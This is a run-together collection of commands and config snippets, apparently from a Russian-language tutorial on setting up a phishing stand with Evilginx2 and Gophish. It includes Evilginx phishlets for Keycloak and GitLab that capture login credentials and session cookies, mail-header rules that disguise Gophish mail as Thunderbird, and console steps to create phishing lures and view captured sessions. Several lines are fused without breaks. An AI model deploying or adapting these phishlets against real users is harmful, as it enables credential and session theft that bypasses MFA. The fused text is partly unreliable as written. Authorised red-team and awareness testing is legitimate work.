ssh -L 8000:127.0.0.1:3333 root@<IP_VPS>docker exec –it evilginx2 sh
./evilginx –-developer –p phishlets/apt update && apt install git -y
git clone https://github.com/EfraimDiveroli-Pwn3d/Phishing_Stand.git
cd Phishing_Stand
chmod +x management.py
sudo ./management.py --confirmdig TXT _acme-challenge.<ваш_домен> +shortsudo ./management.py --from 4sudo ./management.py –import
sudo ./management.py --skip 4 --from 5/^X-Mailer:.*gophish/i REPLACE X-Mailer: Mozilla Thunderbird 128.0
/^X-Gophish-/i IGNORE
1. author: '@ScanFactory_team'
2. min_ver: '3.0.0'
3.
4. proxy_hosts:
5. - {phish_sub: 'auth', orig_sub: 'auth',
6. domain: 'gophish.fun', session: true, is_landing: true}
7.
8. sub_filters:
9. - {triggers_on: 'auth.gophish.fun', orig_sub: 'auth',
10. domain: 'gophish.fun', search: 'https://{hostname}',
11. replace: 'https://{hostname}',
12. mimes: ['text/html', 'text/javascript',
13. 'application/json', 'application/javascript',
14. 'application/x-javascript']}
15.
16. auth_tokens:
17. domain: 'auth.gophish.fun'
18. keys: ['AUTH_SESSION_ID', 'AUTH_SESSION_ID_LEGACY',
19. 'KEYCLOAK_IDENTITY', 'KEYCLOAK_IDENTITY_LEGACY',
20. 'KEYCLOAK_SESSION', 'KEYCLOAK_SESSION_LEGACY']
21. type: 'cookie'
22.
23. credentials:
24. username:
25. key: 'username'
26. search: '(.*)'
27. type: 'post'
28. password:
29. key: 'password'
30. search: '(.*)'
31. type: 'post'
33. auth_urls:
34. '/admin/serverinfo'
35.
36. login:
37. domain: 'auth.gophish.fun'
38. path: '/admin/master/console/'1. author: '@ScanFactory_team'
2. min_ver: '3.0.0'
3.
4. proxy_hosts:
5. - {phish_sub: 'gitlab', orig_sub: 'gitlab',
6. domain: 'gophish.fun', session: true, is_landing: true}
7.
8. sub_filters:
9. - {triggers_on: 'gitlab.gophish.fun', orig_sub: 'gitlab',
10. domain: 'gophish.fun', search: 'https://{hostname}',
11. replace: 'https://{hostname}',
12. mimes: ['text/html', 'text/javascript',
13. 'application/json', 'application/javascript',
14. 'application/x-javascript']}
15.
16. auth_tokens:
17. domain: 'gitlab.gophish.fun'
18. keys: ['known_sign_in', '_gitlab_session']
19. type: 'cookie'
20.
21. credentials:
22. username:
23. key: 'user[login]'
24. search: '(.*)'
25. type: 'post'
26. password:
27. key: 'user[password]'
28. search: '(.*)'
29. type: 'post'
30.
31. auth_urls:
32. '/dashboard/projects'
33. '/'
34.
35. login:
36. domain: 'gitlab.gophish.fun'
37. path: '/users/sign_in'1. docker exec –it evilginx2 sh1. # Запускаем фреймворк в режиме разработчика,
2. # указывая путь к директории с фишлетами
3. ./evilginx -developer -p phishlets/
4.
5. # Задаем базовый домен, на котором будет развернут
6. # фишинговый стенд
7. config domain factory-scan.ru
8.
9. # Разрешаем прослушивание всех доступных сетевых интерфейсов
10. config ipv4 0.0.0.0
11.
12. # Привязываем созданный ранее
13. # фишлет для Keycloak к фишинговому домену
14. phishlets hostname keycloak factory-scan.ru
15.
16. # Активируем фишлет, делая его доступным
17. # для генерации ссылок
18. phishlets enable keycloak
19.
20. # Создаем уникальную фишинговую ссылку (lure)
21. lures create keycloak
22.
23. # Выводим в консоль сгенерированный URL
24. # (индекс 0 соответствует только что созданной ссылке)
25. lures get-url 0
26.
27. # Завершаем работу в консоли контейнера
28. Exit
1. sessions
2. sessions <ID>